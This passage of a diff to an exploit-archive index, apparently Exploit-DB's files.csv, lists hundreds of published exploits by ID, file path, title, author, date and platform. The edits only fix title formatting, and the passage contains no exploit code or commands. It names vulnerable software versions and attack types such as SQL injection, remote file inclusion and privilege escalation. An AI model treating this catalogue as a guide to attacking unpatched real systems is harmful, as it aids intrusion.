Scripting",2008-07-09,"Julian Rodriguez",php,webapps,0 32024,platforms/php/webapps/32024.txt,"V-webmail 1.6.4 - includes/pear/Mail/RFC822.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 32025,platforms/php/webapps/32025.txt,"V-webmail 1.6.4 - includes/pear/Net/Socket.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 32026,platforms/php/webapps/32026.txt,"V-webmail 1.6.4 - includes/pear/XML/parser.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0 @@ -28910,9 +28913,9 @@ id,file,description,date,author,platform,type,port 32063,platforms/php/webapps/32063.txt,"Claroline 1.8.9 - document/document.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32064,platforms/php/webapps/32064.txt,"Claroline 1.8.9 - exercise/exercise.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32065,platforms/php/webapps/32065.txt,"Claroline 1.8.9 - group/group_space.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32066,platforms/php/webapps/32066.txt,"Claroline 1.8.9 - PHPbb/newtopic.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32067,platforms/php/webapps/32067.txt,"Claroline 1.8.9 - PHPbb/reply.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32068,platforms/php/webapps/32068.txt,"Claroline 1.8.9 - PHPbb/viewtopic.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 +32066,platforms/php/webapps/32066.txt,"Claroline 1.8.9 - phpBB/newtopic.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 +32067,platforms/php/webapps/32067.txt,"Claroline 1.8.9 - phpBB/reply.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 +32068,platforms/php/webapps/32068.txt,"Claroline 1.8.9 - phpBB/viewtopic.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32069,platforms/php/webapps/32069.txt,"Claroline 1.8.9 - wiki/wiki.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32070,platforms/php/webapps/32070.txt,"Claroline 1.8.9 - work/work.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 - claroline/redirector.php url Variable Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0 @@ -29086,7 +29089,7 @@ id,file,description,date,author,platform,type,port 33409,platforms/php/webapps/33409.txt,"Article Directory - 'login.php' SQL Injection",2009-12-16,"R3d D3v!L",php,webapps,0 32261,platforms/windows/local/32261.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",windows,local,0 32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 - '$newpm[title]' Parameter Cross-Site Scripting",2008-08-20,"Core Security",php,webapps,0 -32263,platforms/php/webapps/32263.txt,"Trixbox - 'endpoint_aastra.php mac parameter'Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 +32263,platforms/php/webapps/32263.txt,"Trixbox - 'endpoint_aastra.php mac parameter' Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 - includes/modules/faqdesk/faqdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 - includes/modules/newsdesk/newsdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 @@ -29099,7 +29102,7 @@ id,file,description,date,author,platform,type,port 32368,platforms/jsp/webapps/32368.txt,"McAfee Asset Manager 6.6 - Multiple Vulnerabilities",2014-03-19,"Brandon Perry",jsp,webapps,80 32274,platforms/php/webapps/32274.txt,"Synology DSM 4.3-3827 - 'article.php' Blind SQL Injection",2014-03-14,"Michael Wisniewski",php,webapps,80 32275,platforms/php/webapps/32275.txt,"itMedia - Multiple SQL Injections",2008-08-18,baltazar,php,webapps,0 -32332,platforms/windows/dos/32332.txt,"Free Download Manager - Stack-based Buffer Overflow",2014-03-17,"Julien Ahrens",windows,dos,80 +32332,platforms/windows/dos/32332.txt,"Free Download Manager - Stack Based Buffer Overflow",2014-03-17,"Julien Ahrens",windows,dos,80 32278,platforms/asp/webapps/32278.txt,"K Web CMS - 'sayfala.asp' SQL Injection",2008-08-18,baltazar,asp,webapps,0 32279,platforms/php/webapps/32279.txt,"Vanilla 1.1.4 - HTML Injection / Cross-Site Scripting",2008-08-19,"James Bercegay",php,webapps,0 32280,platforms/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script - 'id' Parameter SQL Injection",2008-08-20,"Hussin X",php,webapps,0 @@ -29135,7 +29138,7 @@ id,file,description,date,author,platform,type,port 32315,platforms/php/webapps/32315.txt,"OpenDB 1.0.6 - user_profile.php redirect_url Parameter Cross-Site Scripting",2008-08-28,C1c4Tr1Z,php,webapps,0 32316,platforms/php/webapps/32316.txt,"eliteCMS 1.0 - 'page' Parameter SQL Injection",2008-09-03,e.wiZz!,php,webapps,0 32317,platforms/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting",2008-09-03,C1c4Tr1Z,php,webapps,0 -32318,platforms/php/webapps/32318.txt,"XRms 1.99.2 - login.php target Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32318,platforms/php/webapps/32318.txt,"XRms 1.99.2 - 'login.php' target Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 32319,platforms/php/webapps/32319.txt,"OpenSupports 2.x - Authentication Bypass / Cross-Site Request Forgery",2014-03-17,"TN CYB3R",php,webapps,0 32320,platforms/php/webapps/32320.txt,"XRms 1.99.2 - activities/some.php title Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 32321,platforms/php/webapps/32321.txt,"XRms 1.99.2 - companies/some.php company_name Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 @@ -29323,10 +29326,10 @@ id,file,description,date,author,platform,type,port 32547,platforms/php/webapps/32547.txt,"Extrakt Framework 0.7 - 'index.php' Cross-Site Scripting",2008-10-29,ShockShadow,php,webapps,0 32548,platforms/linux/remote/32548.html,"Opera Web Browser 9.x - History Search and Links Panel Cross-Site Scripting",2008-10-30,"Stefano Di Paola",linux,remote,0 32549,platforms/asp/webapps/32549.txt,"Dorsa CMS - 'Default_.aspx' Cross-Site Scripting",2008-10-29,Pouya_Server,asp,webapps,0 -32550,platforms/windows/dos/32550.html,"Microsoft DebugDiag 1.0 - 'CrashHangExt.dll' ActiveX Control Remote Denial of Service",2008-10-30,suN8Hclf,windows,dos,0 +32550,platforms/windows/dos/32550.html,"Microsoft DebugDiag 1.0 - ' CrashHangExt.dll' ActiveX Control Remote Denial of Service",2008-10-30,suN8Hclf,windows,dos,0 32551,platforms/linux/dos/32551.txt,"Dovecot 1.1.x - Invalid Message Address Parsing Denial of Service",2008-10-30,anonymous,linux,dos,0 32552,platforms/hardware/remote/32552.txt,"SonicWALL - Content Filtering Blocked Site Error Page Cross-Site Scripting",2008-10-30,pagvac,hardware,remote,0 -32553,platforms/php/webapps/32553.txt,"PHPWebSite 0.9.3 - 'links.php' SQL Injection",2008-10-31,"Beenu Arora",php,webapps,0 +32553,platforms/php/webapps/32553.txt,"phpWebSite 0.9.3 - 'links.php' SQL Injection",2008-10-31,"Beenu Arora",php,webapps,0 32554,platforms/php/webapps/32554.txt,"SpitFire Photo Pro - 'pages.php' SQL Injection",2008-10-31,"Beenu Arora",php,webapps,0 32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 - History Search Input Validation",2008-10-31,NeoCoderz,windows,remote,0 32556,platforms/multiple/webapps/32556.txt,"Dell SonicWALL EMail Security Appliance Application 7.4.5 - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,multiple,webapps,8619 @@ -29364,7 +29367,7 @@ id,file,description,date,author,platform,type,port 32590,platforms/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow",2008-11-19,"Marius Wachtler",windows,local,0 32591,platforms/hardware/remote/32591.txt,"3Com Wireless 8760 Dual-Radio 11a/b/g PoE - Multiple Security Vulnerabilities",2008-11-19,"Adrian Pastor",hardware,remote,0 32592,platforms/php/webapps/32592.txt,"Easyedit CMS - subcategory.php intSubCategoryID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 -32593,platforms/php/webapps/32593.txt,"Easyedit CMS - page.php intPageID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 +32593,platforms/php/webapps/32593.txt,"Easyedit CMS - 'page.php' intPageID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 32594,platforms/php/webapps/32594.txt,"Easyedit CMS - news.php intPageID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 32595,platforms/php/webapps/32595.txt,"Softbiz Classifieds Script - Cross-Site Scripting",2008-11-20,"Vahid Ezraeil",php,webapps,0 32596,platforms/multiple/dos/32596.txt,"GeSHi 1.0.x - XML Parsing Remote Denial Of Service",2008-11-20,"Christian Hoffmann",multiple,dos,0 @@ -29467,7 +29470,7 @@ id,file,description,date,author,platform,type,port 32694,platforms/osx/dos/32694.pl,"Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (1)",2009-01-01,"Jeremy Brown",osx,dos,0 32695,platforms/osx/dos/32695.php,"Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (2)",2009-01-01,Pr0T3cT10n,osx,dos,0 32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 - Multiple Cross-Site Scripting / Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0 -32697,platforms/linux/dos/32697.pl,"aMSN - '.ctt'Remote Denial of Service",2009-01-03,Hakxer,linux,dos,0 +32697,platforms/linux/dos/32697.pl,"aMSN - '.ctt' Remote Denial of Service",2009-01-03,Hakxer,linux,dos,0 32698,platforms/php/webapps/32698.txt,"SolucionXpressPro - 'main.php' SQL Injection",2009-01-05,Ehsan_Hp200,php,webapps,0 32699,platforms/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure",2009-01-05,"Aditya K Sood",windows,remote,0 32700,platforms/linux/local/32700.rb,"ibstat $PATH - Privilege Escalation",2014-04-04,Metasploit,linux,local,0 @@ -29549,7 +29552,7 @@ id,file,description,date,author,platform,type,port 32784,platforms/php/webapps/32784.txt,"glFusion 1.1 - Anonymous Comment 'username' Field HTML Injection",2009-02-05,"Bjarne Mathiesen Schacht",php,webapps,0 32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 - Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0 33129,platforms/hardware/webapps/33129.html,"Beetel 450TC2 Router - Admin Password Cross-Site Request Forgery",2014-04-30,"shyamkumar somana",hardware,webapps,80 -33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 - login.php goto Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 +33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 - 'login.php' goto Parameter Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 32789,platforms/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface - Authenticated Arbitrary Command Execution",2014-04-10,Metasploit,unix,remote,443 32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - Cross-Site Request Forgery",2014-04-10,"High-Tech Bridge SA",php,webapps,80 32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL - Information Leak Exploit (1)",2014-04-10,prdelka,multiple,remote,443 @@ -29559,7 +29562,7 @@ id,file,description,date,author,platform,type,port 32795,platforms/novell/remote/32795.txt,"Novell QuickFinder Server - Multiple Cross-Site Scripting Vulnerabilities",2009-02-09,"Ivan Sanchez",novell,remote,0 32796,platforms/linux/remote/32796.txt,"Swann DVR4 SecuraNet - Directory Traversal",2009-02-10,"Terry Froy",linux,remote,0 32797,platforms/asp/webapps/32797.txt,"Banking@Home 2.1 - 'login.asp' Multiple SQL Injection",2009-02-10,"Francesco Bianchino",asp,webapps,0 -32798,platforms/multiple/remote/32798.pl,"ProFTPD 1.3 - 'mod_sql' Username SQL Injection",2009-02-10,AlpHaNiX,multiple,remote,0 +32798,platforms/multiple/remote/32798.pl,"ProFTPd 1.3 - 'mod_sql' Username SQL Injection",2009-02-10,AlpHaNiX,multiple,remote,0 32799,platforms/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software - ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,windows,remote,0 32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Multiple Denial of Service Vulnerabilities",2009-02-12,Romario,linux,dos,0 32801,platforms/hardware/remote/32801.txt,"Barracuda Load Balancer - 'realm' Parameter Cross-Site Scripting",2009-02-05,"Jan Skovgren",hardware,remote,0 @@ -29661,7 +29664,7 @@ id,file,description,date,author,platform,type,port 32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'safe_mode' and 'open_basedir' Restriction-Bypass",2009-04-10,"Maksymilian Arciemowicz",php,local,0 32902,platforms/windows/dos/32902.py,"Microsoft Internet Explorer 8 - File Download Denial of Service",2009-04-11,"Nam Nguyen",windows,dos,0 32903,platforms/asp/webapps/32903.txt,"People-Trak - Login SQL Injection",2009-04-13,Mormoroth.net,asp,webapps,0 -32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 - login.php Cross-Site Scripting",2009-04-09,"Gerendi Sandor Attila",php,webapps,0 +32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 - 'login.php' Cross-Site Scripting",2009-04-09,"Gerendi Sandor Attila",php,webapps,0 32906,platforms/php/webapps/32906.txt,"LinPHA 1.3.2/1.3.3 - new_images.php Cross-Site Scripting",2009-04-09,"Gerendi Sandor Attila",php,webapps,0 32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension - 'apps/web/vs_diag.cgi' Cross-Site Scripting",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0 32908,platforms/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",multiple,webapps,0 @@ -29705,7 +29708,7 @@ id,file,description,date,author,platform,type,port 32948,platforms/php/webapps/32948.txt,"New5starRating 1.0 - 'admin/control_panel_sample.php' SQL Injection",2009-04-22,zer0day,php,webapps,0 32949,platforms/multiple/dos/32949.txt,"Mani's Admin Plugin - Remote Denial Of Service",2009-04-22,M4rt1n,multiple,dos,0 32950,platforms/php/webapps/32950.txt,"Flat Calendar 1.1 - 'add.php' HTML Injection",2009-04-22,ZoRLu,php,webapps,0 -32951,platforms/novell/dos/32951.py,"Recover Data for Novell Netware 1.0 - '.sav'Remote Denial of Service",2009-04-23,"AbdulAziz Hariri",novell,dos,0 +32951,platforms/novell/dos/32951.py,"Recover Data for Novell Netware 1.0 - '.sav' Remote Denial of Service",2009-04-23,"AbdulAziz Hariri",novell,dos,0 32952,platforms/php/webapps/32952.txt,"CS Whois Lookup - 'ip' Parameter Remote Command Execution",2009-04-23,SirGod,php,webapps,0 32953,platforms/asp/webapps/32953.vbs,"PuterJam's Blog PJBlog3 3.0.6 - 'action.asp' SQL Injection",2009-04-24,anonymous,asp,webapps,0 32954,platforms/hardware/remote/32954.txt,"Linksys WVC54GCA 1.00R22/1.00R24 Wireless-G - 'adm/file.cgi' Multiple Directory Traversal Vulnerabilities",2009-04-23,pagvac,hardware,remote,0 @@ -29995,7 +29998,7 @@ id,file,description,date,author,platform,type,port 33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 - register.php result Parameter Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0 33344,platforms/php/webapps/33344.txt,"CuteNews 1.4.6 - 'index.php' New User Creation Cross-Site Request Forgery",2009-11-10,"Andrew Horton",php,webapps,0 33709,platforms/php/webapps/33709.txt,"Natychmiast CMS - Multiple Cross-Site Scripting / SQL Injection",2010-03-05,"Maciej Gojny",php,webapps,0 -33710,platforms/windows/dos/33710.txt,"J. River Media Jukebox 12 - '.mp3'Remote Heap Buffer Overflow",2010-03-04,"Gjoko Krstic",windows,dos,0 +33710,platforms/windows/dos/33710.txt,"J. River Media Jukebox 12 - '.mp3' Remote Heap Buffer Overflow",2010-03-04,"Gjoko Krstic",windows,dos,0 33255,platforms/linux/local/33255.txt,"Xen 3.x - pygrub Local Authentication Bypass",2009-09-25,"Jan Lieskovsky",linux,local,0 33247,platforms/hardware/webapps/33247.txt,"OpenFiler 2.99.1 - Arbitrary Code Execution",2014-05-08,"Dolev Farhi",hardware,webapps,0 33248,platforms/hardware/webapps/33248.txt,"OpenFiler 2.99.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-05-08,"Dolev Farhi",hardware,webapps,0 @@ -30121,7 +30124,7 @@ id,file,description,date,author,platform,type,port 33391,platforms/php/webapps/33391.txt,"YABSoft Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting",2009-12-07,"aBo MoHaMeD",php,webapps,0 33392,platforms/php/webapps/33392.txt,"YOOtheme Warp5 Joomla! Component - 'yt_color' Parameter Cross-Site Scripting",2009-12-04,andresg888,php,webapps,0 33393,platforms/php/webapps/33393.txt,"Joomla! You!Hostit! 1.0.1 Template - Cross-Site Scripting",2009-12-04,andresg888,php,webapps,0 -33394,platforms/php/webapps/33394.txt,"Invision Power Board 3.0.3 - '.txt'MIME-Type Cross-Site Scripting",2009-12-09,Xacker,php,webapps,0 +33394,platforms/php/webapps/33394.txt,"Invision Power Board 3.0.3 - '.txt' MIME-Type Cross-Site Scripting",2009-12-09,Xacker,php,webapps,0 33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0 33396,platforms/php/webapps/33396.txt,"Zeeways ZeeJobsite - 'basic_search_result.php' Cross-Site Scripting",2009-12-10,bi0,php,webapps,0 33397,platforms/linux/dos/33397.txt,"MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service",2009-11-23,"Shane Bester",linux,dos,0 @@ -30217,7 +30220,7 @@ id,file,description,date,author,platform,type,port 33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0 33589,platforms/linux/local/33589.c,"Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0 33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0 -33524,platforms/linux/dos/33524.txt,"OpenOffice 3.1 - '.csv'Remote Denial of Service",2010-01-14,"Hellcode Research",linux,dos,0 +33524,platforms/linux/dos/33524.txt,"OpenOffice 3.1 - '.csv' Remote Denial of Service",2010-01-14,"Hellcode Research",linux,dos,0 33525,platforms/php/remote/33525.txt,"Zend Framework 1.9.6 - Multiple Input Validation Vulnerabilities / Security Bypass",2010-01-14,"draic Brady",php,remote,0 33526,platforms/php/webapps/33526.txt,"Technology for Solutions 1.0 - 'id' Parameter Cross-Site Scripting",2010-01-14,PaL-D3v1L,php,webapps,0 33527,platforms/unix/dos/33527.py,"IBM Tivoli Directory Server 6.2 - 'ibmdiradm' Null Pointer Dereference Denial of Service",2006-04-01,Intevydis,unix,dos,0 @@ -30246,7 +30249,7 @@ id,file,description,date,author,platform,type,port 33546,platforms/php/webapps/33546.txt,"Jokes Complete Website - results.php searchingred Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 - 'misc.php' SQL Injection",2010-01-18,indoushka,php,webapps,0 33548,platforms/php/webapps/33548.txt,"THELIA 1.4.2.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,EsSandRe,php,webapps,0 -33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - '.slk'NULL Pointer Dereference Remote Denial of Service",2010-01-19,"Hellcode Research",linux,dos,0 +33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - '.slk' NULL Pointer Dereference Remote Denial of Service",2010-01-19,"Hellcode Research",linux,dos,0 33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents 2.0.3 - Authentication Bypass / Multiple SQL Injection",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0 33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' Parameter SQL Injection",2010-01-20,Ctacok,php,webapps,0 33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 - URI Validation Remote Code Execution",2010-01-21,"Lostmon Lords",windows,remote,0 @@ -30367,7 +30370,7 @@ id,file,description,date,author,platform,type,port 33716,platforms/php/webapps/33716.txt,"Saskia's Shopsystem - 'id' Parameter Local File Inclusion",2010-03-05,"cr4wl3r ",php,webapps,0 33717,platforms/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,multiple,webapps,0 33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 - Remote Buffer Overflow",2010-04-15,mr_me,windows,dos,0 -33711,platforms/windows/dos/33711.txt,"BS.Player 2.51 - '.mp3'Buffer Overflow",2010-03-05,"Gjoko Krstic",windows,dos,0 +33711,platforms/windows/dos/33711.txt,"BS.Player 2.51 - '.mp3' Buffer Overflow",2010-03-05,"Gjoko Krstic",windows,dos,0 33712,platforms/windows/remote/33712.txt,"VLC Media Player 1.0.x - Bookmark Creation Buffer Overflow",2010-03-05,"Gjoko Krstic",windows,remote,0 33718,platforms/php/webapps/33718.txt,"phpCOIN 1.2.1 - 'mod' Parameter Local File Inclusion",2010-03-06,_mlk_,php,webapps,0 33719,platforms/windows/dos/33719.py,"Microsoft Windows XP/Vista - '.ani' 'tagBITMAPINFOHEADER' Denial of Service",2010-03-08,Skylined,windows,dos,0 @@ -30492,7 +30495,7 @@ id,file,description,date,author,platform,type,port 33847,platforms/multiple/remote/33847.txt,"netkar-PRO 1.1 - Remote Stack Buffer Overflow",2010-04-13,"Luigi Auriemma",multiple,remote,0 33848,platforms/windows/remote/33848.py,"WinMount 3.3.401 - '.zip' Remote Buffer Overflow",2010-04-19,lilf,windows,remote,0 33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST parameter) SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0 -33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser'File Creation NULL Pointer Denial Of Service",2014-06-13,"A reliable source",windows,dos,0 +33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation NULL Pointer Denial Of Service",2014-06-13,"A reliable source",windows,dos,0 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0 33851,platforms/php/webapps/33851.txt,"Wordpress TimThumb 2.8.13 WebShot Plugin/Theme - Remote Code Execution",2014-06-24,@u0x,php,webapps,0 33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",multiple,remote,0 @@ -30720,7 +30723,7 @@ id,file,description,date,author,platform,type,port 34091,platforms/php/webapps/34091.txt,"Pay Per Minute Video Chat Script 2.x - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0 34092,platforms/jsp/webapps/34092.txt,"JForum 2.1.8 - 'bookmarks' Module Multiple HTML Injection Vulnerabilities",2010-06-06,"Adam Baldwin",jsp,webapps,0 34093,platforms/windows/dos/34093.txt,"EA Battlefield 2 1.41 and Battlefield 2142 1.50 - Multiple Denial Of Service Vulnerabilities",2010-06-07,"Francis Lavoie-Renaud",windows,dos,0 -34094,platforms/windows/dos/34094.pl,"Aqua Real Screensaver - '.ar'Buffer Overflow",2010-01-15,R3d-D3V!L,windows,dos,0 +34094,platforms/windows/dos/34094.pl,"Aqua Real Screensaver - '.ar' Buffer Overflow",2010-01-15,R3d-D3V!L,windows,dos,0 34095,platforms/php/webapps/34095.txt,"PonVFTP - 'login.php' SQL Injection",2010-01-15,S2K9,php,webapps,0 34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x - manage/add_user.php user_id Parameter SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0 34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x - manage/main.php fld_path Parameter Cross-Site Scripting",2010-06-06,"High-Tech Bridge SA",php,webapps,0 @@ -30954,7 +30957,7 @@ id,file,description,date,author,platform,type,port 34365,platforms/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",php,webapps,0 34366,platforms/php/webapps/34366.txt,"Stratek Web Design Twilight CMS 4.0 - 'calendar' Cross-Site Scripting",2009-11-02,"Vladimir Vorontsov",php,webapps,0 34367,platforms/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",php,webapps,0 -34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - '.mp3'Remote Buffer Overflow",2009-10-31,4m!n,windows,dos,0 +34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - '.mp3' Remote Buffer Overflow",2009-10-31,4m!n,windows,dos,0 34369,platforms/multiple/remote/34369.txt,"IBM Java - UTF8 Byte Sequences Security Bypass",2010-07-23,IBM,multiple,remote,0 34370,platforms/jsp/webapps/34370.txt,"SAP Netweaver 6.4/7.0 - 'wsnavigator' Cross-Site Scripting",2010-07-23,"Alexandr Polyakov",jsp,webapps,0 34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0 @@ -31041,7 +31044,7 @@ id,file,description,date,author,platform,type,port 34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - NULL Pointer Dereference Denial Of Service",2009-08-14,"Luigi Auriemma",multiple,dos,0 34458,platforms/windows/dos/34458.html,"Microsoft Internet Explorer - Memory Corruption PoC (MS14-029)",2014-08-28,PhysicalDrive0,windows,dos,0 34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 - Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0 -34460,platforms/windows/dos/34460.py,"Sonique 2.0 - '.xpl'Remote Stack-Based Buffer Overflow",2010-08-12,"Hamza_hack_dz & Black-liondz1",windows,dos,0 +34460,platforms/windows/dos/34460.py,"Sonique 2.0 - '.xpl' Remote Stack Based Buffer Overflow",2010-08-12,"Hamza_hack_dz & Black-liondz1",windows,dos,0 34461,platforms/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution",2014-08-29,"Claudio Viviani",multiple,remote,0 34462,platforms/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass",2010-08-13,"Emmanuel Bouillon",windows,remote,0 34463,platforms/windows/dos/34463.py,"HTML Help Workshop 1.4 - (SEH) Buffer Overflow",2014-08-29,"Moroccan Kingdom (MKD)",windows,dos,0 @@ -31053,13 +31056,13 @@ id,file,description,date,author,platform,type,port 34471,platforms/php/webapps/34471.txt,"Beex - partneralle.php navaction Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 34472,platforms/php/webapps/34472.txt,"PHPMass Real Estate - 'view_map.php' Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 34473,platforms/php/webapps/34473.txt,"Property Watch - email.php videoid Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 -34474,platforms/php/webapps/34474.txt,"Property Watch - login.php redirect Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 +34474,platforms/php/webapps/34474.txt,"Property Watch - 'login.php' redirect Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 34475,platforms/php/webapps/34475.txt,"Joomla! 'com_weblinks' Component - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0 34476,platforms/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Parameter Multiple Cross-Site Scripting Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0 34477,platforms/php/webapps/34477.txt,"Joomla! 'com_fireboard' Component - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0 34478,platforms/windows/remote/34478.html,"Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass",2010-08-16,"Mario Heiderich",windows,remote,0 34479,platforms/php/webapps/34479.html,"CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-16,"High-Tech 